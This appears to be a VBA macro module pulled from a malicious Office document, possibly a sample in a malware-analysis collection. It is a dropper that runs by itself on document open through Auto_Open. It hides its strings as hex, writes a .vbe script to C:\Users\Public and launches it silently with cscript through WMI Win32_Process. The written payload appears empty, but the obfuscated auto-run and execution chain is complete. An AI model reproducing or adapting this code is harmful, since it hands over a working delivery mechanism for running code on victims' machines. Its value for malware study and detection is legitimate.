Attribute VB_Name = "SYq2bHBGPVGs"





Public Function c0()
c0 = Hex2Str("63") + Hex2Str("53") + Hex2Str("63") + Hex2Str("52") + Hex2Str("69") + Hex2Str("50") + Hex2Str("74")
End Function
Sub Auto_Open()
t0
End Sub
Public Function j0()
s0 ("""" + c0 + """ /" + "B """ + h0 + """")
End Function
Public Sub s0(n0)
Set d0 = GetObject(Hex2Str("57694E6D476D54733A7B496D506552734F6E4174496F4E6C4576456C3D496D506552734F6E4174457D215C5C2E5C526F4F745C43694D7632"))
Set b0 = d0.Get(Hex2Str("77496E33325F70526F43655373"))
a0 = b0.Create(n0, Null)
End Sub
Public Function h0()
h0 = Hex2Str("43") + Hex2Str("3A") + Hex2Str("5C") + Hex2Str("55") + Hex2Str("73") + Hex2Str("65") + Hex2Str("72") + Hex2Str("73") + Hex2Str("5C") + Hex2Str("50") + Hex2Str("75") + Hex2Str("62") + Hex2Str("6C") + Hex2Str("69") + Hex2Str("63") + Hex2Str("5C") + Hex2Str("70") + Hex2Str("62") + Hex2Str("63") + Hex2Str("2E") + Hex2Str("76") + Hex2Str("62") + Hex2Str("65")
End Function
Public Function t0()
Set p0 = CreateObject(Hex2Str("536372697074696E672E46696C6553797374656D4F626A656374"))
Set g0 = p0.CreateTextFile(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str("")))))))))) + h0 + Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str("")))))))))))
g0.WriteLine Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str("")))))))))) + h0 + Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(Hex2Str(""))))))))))
g0.Close
j0
End Function
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For second = 1 To Len(strData) Step 2
        CryptString = CryptString & Chr$(Val("&H" & Mid$(strData, second, 2)))
    Next second
    Hex2Str = CryptString
End Function




INQUEST-PP=macro
